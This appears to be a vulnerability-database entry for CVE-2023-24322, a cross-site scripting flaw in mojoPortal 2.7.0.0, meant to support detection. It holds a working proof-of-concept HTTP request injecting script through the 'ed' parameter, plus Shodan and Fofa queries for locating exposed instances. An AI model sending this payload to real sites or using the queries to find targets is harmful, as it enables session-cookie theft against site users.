🔙 목록으로 돌아가기

CVE-2023-24322: mojoPortal 2.7.0.0 - Cross-Site Scripting

TitlemojoPortal 2.7.0.0 - Cross-Site Scripting
Authorpikpikcu
SeverityMedium
ImpactUnauthenticated attackers can inject malicious JavaScript through the ed and tbi parameters in FileDialog.aspx to steal user session cookies and execute attacks against mojoPortal users.
RemediationUpgrade to a patched version of mojoPortal or apply the necessary security patches to mitigate the XSS vulnerability.
CVSS Score6.1
EPSS Score0.19147
CVE IDCVE-2023-24322
CWE IDCWE-79
Shodan Queryhtml:"mojoPortal"http.html:"mojoportal"
Fofa Querybody="mojoportal"
Tags cve cve2023 cves mojoportal xss vuln

🔍 Vulnerability Description

mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.

🌐 HTTP Request

GET /Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24322.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-24322.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A